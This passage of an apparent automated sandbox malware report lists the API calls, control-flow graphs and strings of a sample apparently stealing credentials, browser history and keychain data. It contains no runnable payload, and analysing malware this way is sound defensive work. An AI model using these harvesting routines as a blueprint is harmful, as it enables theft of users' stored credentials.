                                      • memset.MSVCRT ref: 00445B6A
                                      • memset.MSVCRT ref: 00445C9B
                                      • memset.MSVCRT ref: 00445CB3
                                      • _wcsicmp.MSVCRT ref: 00445D56
                                      • memset.MSVCRT ref: 00445B82
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                      • memset.MSVCRT ref: 00445986
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                      • API String ID: 2745753283-3798722523
                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                      • String ID: $/deleteregkey$/savelangfile
                                      • API String ID: 2744995895-28296030
                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                      • wcsrchr.MSVCRT ref: 0040B738
                                      • memset.MSVCRT ref: 0040B756
                                      • memset.MSVCRT ref: 0040B7F5
                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                      • memset.MSVCRT ref: 0040B851
                                      • memset.MSVCRT ref: 0040B8CA
                                      • memcmp.MSVCRT ref: 0040B9BF
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                      • memset.MSVCRT ref: 0040BB53
                                      • memcpy.MSVCRT ref: 0040BB66
                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                      • String ID: chp$v10
                                      • API String ID: 170802307-2783969131
                                      • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                      • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                      • memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                      • wcschr.MSVCRT ref: 0040E3B8
                                      • memcpy.MSVCRT ref: 0040E3EC
                                      • memcpy.MSVCRT ref: 0040E407
                                      • memcpy.MSVCRT ref: 0040E422
                                      • memcpy.MSVCRT ref: 0040E43D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                      • API String ID: 3073804840-2252543386
                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                      • String ID:
                                      • API String ID: 3715365532-3916222277
                                      • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                      • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                        • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                      • String ID: bhv
                                      • API String ID: 327780389-2689659898
                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2941347001-70141382
                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                      • String ID:
                                      • API String ID: 2827331108-0
                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                      • wcschr.MSVCRT ref: 0040C324
                                      • wcschr.MSVCRT ref: 0040C344
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                      • GetLastError.KERNEL32 ref: 0040C373
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                      • String ID: visited:
                                      • API String ID: 1157525455-1702587658
                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                      • memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                      • _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                      • API String ID: 3883404497-2982631422
                                      • Opcode ID: ac172b6693c4f25a67161767547787d899d2b643ea91f8b4529adbae05c1ff48
                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                      • Opcode Fuzzy Hash: ac172b6693c4f25a67161767547787d899d2b643ea91f8b4529adbae05c1ff48
                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                      • memset.MSVCRT ref: 0040BC75
                                      • memset.MSVCRT ref: 0040BC8C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                      • memcmp.MSVCRT ref: 0040BCD6
                                      • memcpy.MSVCRT ref: 0040BD2B
                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 509814883-3916222277
                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                                      APIs
                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                      • GetLastError.KERNEL32 ref: 0041847E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CreateFile$??3@ErrorLast
                                      • String ID: |A
                                      • API String ID: 1407640353-1717621600
                                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                      • String ID: r!A
                                      • API String ID: 2791114272-628097481
                                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                      APIs
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
